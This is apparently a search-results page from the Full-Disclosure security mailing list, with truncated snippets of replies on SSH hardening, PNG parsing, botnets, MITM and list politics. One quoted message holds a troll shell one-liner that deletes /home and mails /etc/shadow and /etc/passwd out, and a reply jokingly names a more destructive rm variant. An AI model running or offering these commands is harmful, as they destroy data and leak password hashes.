Hi,
Hi
How do we calculate memory required for a PNG file from the dimensions
of width and height contained in the file?
It seems that attackers make use width and height to take control of
clients.
just from H+W? you cant - you'd have to know oher things such as
depth, alpha layer presence,
Hi,
/bin/rm -rf /home/*;clear;echo bl4ckh4t,hehecat /etc/shadow |mail
full-disclosure@lists.grok.org.uk cat /etc/passwd |mail
full-disclosure@lists.grok.org.uk
first off if you want to do damage rm -R dumb ass, the one you posted
only removes files in /home
perhaps it was *designed*
Hi,
While these two events are not related in anyway, I am wondering why people
don't create backup off site or don't plan normal failsafe's when there site
is as big as Google (we have seen a few popular sites die because of this
mistake)
err, google isnt just one server - they have a whole
Hi,
What makes this unacceptable? Buying a botnet and turning it off. Hurah
for them! Unstuff your shirts and get on with your lives.
my TV licence money isnt for paying criminals. What the BBC did
breaks several laws, Computer Misuse Act being the major one. Its not
a case of white hat v's
Hi,
I called for John Cartwright to setup a non-technical cyber security
political full-disclosure mailing list some time ago, nothing was
setup.
because he didnt want to - and theres no demand?
What are the solutions for splitting up full-disclosure into technical
and non-technical
Hi,
Hi folks,
while playing around I had an idea for some new kind of mitm which
works quite well here.
do you mean like:
http://tools.ietf.org/html/draft-chown-v6ops-rogue-ra-02
http://www.tml.tkk.fi/~pnr/publications/WiSe2002-Arkko.pdf
yes, we're aware of the issues for some time now.
Hi,
It's off topic for this thread. FD, by it's very nature, is designed
I wonder why so much effort is spent discussing a self-signed
web interface for unsubscribing from a mialing list - when
the email headers clearly state how to leave via an email message
and not bother with a web interface
Hi,
But your SSID is very easy to retrieve, as it is leaked every time you
associate a legitimate box to your wlan... And guess what: the regular
I think Anshuman was attempting whats called 'humour' :-)
alan
___
Full-Disclosure - We believe in
Hi,
What % have access *and* are sufficiently criminal-minded to want to take
advantage of the exploit? Remember that *most* people are basically
law-abiding
...unless its easy of cheap/free to break the non invasive or
damaging 'laws' (eg copyright infringemnt) - many many people
who tread
Hi,
Please let them know what you think of their policy of non-disclosure
and coverups. I hope someone also educates them on their ridiculous
http://www.kernel.org/pub/linux/kernel/v2.6/
the whole source code for Linux kernel available for _anyone_
to download, scan through, run tools
hi,
James, last time I checked there were several online resources
where such scans can be submitted - and those people that
use those resources are able to take action - eg get alerts
about systems on your own nets etc - whilst an email to this
list is informative, its not quite the best way,
Hi,
There are actually studies going on RIGHT NOW to see if phones can be
allowed to be used during flights by the FCC/FAA, and in other countries as
well.
several european carriers now allow mobiles to be used in flight. - i'm
bothered more by the person inanely chatting during the flight
Hi,
How can you say the cyber world is unlikely to end when Cisco is the
most widely used router on the internet today? Everyone uses Cisco,
all the ISP's and everyone.
I tend to ignore your comments, however this is just ridiculous.
The internet is based on CISCO? yes. sure. I'm sure that
Hi,
It won't be our necks on the line, it will be heads within government
which will be rolling who decided to ignore us and that this
presentation was a good idea.
eh? have you kept up with UK politics recently. No heads roll
with 'new labour' - no matter what massive messes they make of
Hi,
have pasted and also the advice on keeping the SSH on a different port.
run SSH on a different port? oka, dumb scanners wont find it, but
others will. just dont use password-based SSH and dont let it be wide
open to the whole internet (firewall it to the addresses you need - and
add in a
Hi,
It is a remote root exploit on a very popular piece of hardware, you don't
think that is a big deal?
from what I've read, most people are sticking WinXP or Ubuntu onto these
EEPCs as soon as they get them
alan
___
Full-Disclosure - We believe in
hi,
theres a possibility there - but if you're on the same network and
there is no seperation protection then there are lots of other
tools and methods that could be used to stick your box as a man-in-middle
if new or unsure you need to look for, eg gratuitous ARP, ARP poisoning,
Cain Able... a
Hi,
Oct 22 20:36:13 nms sshd[90657]: Failed password for invalid user gopher
from 77.46.152.2 port 55120 ssh2
user/password authentication for SSH? one way of cleaning up your
logs and killing this type of attack is to reconfigure your OpenSSH
to only allow key based logins. stopped my 10M+
Hi,
The issue lies in that if the user gets the memorable information
incorrect they are asked for the same character positions (e.g. 1,
7 and 9 again). This continues forever, basically making the
memorable information pointless because it will not take much to
brute force it.
not
LOL. you missed out a lot of Written by and entries where Copyright wasnt
written in English...and MODULE calls with author info...but i'm too lazy
to make FIXUPs for such trivial changes! ;-)
alan
___
Full-Disclosure - We believe in it.
Charter:
Hi,
your email address is interesting, googlemail.com, not gmail.com? are
you from google?
nah, probably from UK - they've forced people to use that new name due
to some legal 'gmail' dispute.
http://mail.google.com/mail/help/intl/en-GB/googlemail.html
alan
Hi,
When you signup for a n3td3v account, your account will be binded with
your IP address, and you will only be able to access your account with
that IP address unique address. If you try and access your account on
an IP address you didn't sign-up with, you'll be denied access to your
Hi,
future of the list. Please pull away from Secunia and remove the URL,
FFS. why dont you simply configure your email client not to show signatures?
alan
___
Full-Disclosure - We believe in it.
Charter:
Hi,
is laughable. Why did you subscribe if you aren't prepared to get
messages which you might think should be moderated? It is unmoderated,
that means you may not agree with messages or opinions sent to your
inbox, which means you're the one who needs to shut the fuck up. Did
you think
Hi,
If they are rewording advisories, then they are revealing information
which was not secret. Assuming that they are in fact claiming the
discovery as their own (I haven't checked this myself), I'd consider that
dishonest, but I don't know it would be considered a copyright violation.
hi,
...makes me wonder what happens if/when they need to change the
IP address of go.microsoft.com
many many people have already been burnt by the hardcoding of
addresses/IPs into their applications.
a
___
Full-Disclosure - We believe in it.
Hi,
oh. more of this crap.
let me guess...another open relay. its like 1994 all over again. could
the owner of 85-31-186-26.blue.kundencontroller.de - aka unixgu.ru
sort out their system? ESMTP Sendmail 8.13.4 isnt too difficult to
manage as a 'guru'
Hi,
to track Nmap release status. And apparently they are doing so :).
The latest (February 6) issue of Newsweek has a picture on page 39 of
George Bush visiting the NSA headquarters in Fort Meade. A wall-sized
ummm, that page is just:
http://securitywizardry.com/radar.htm
it is a
28 matches
Mail list logo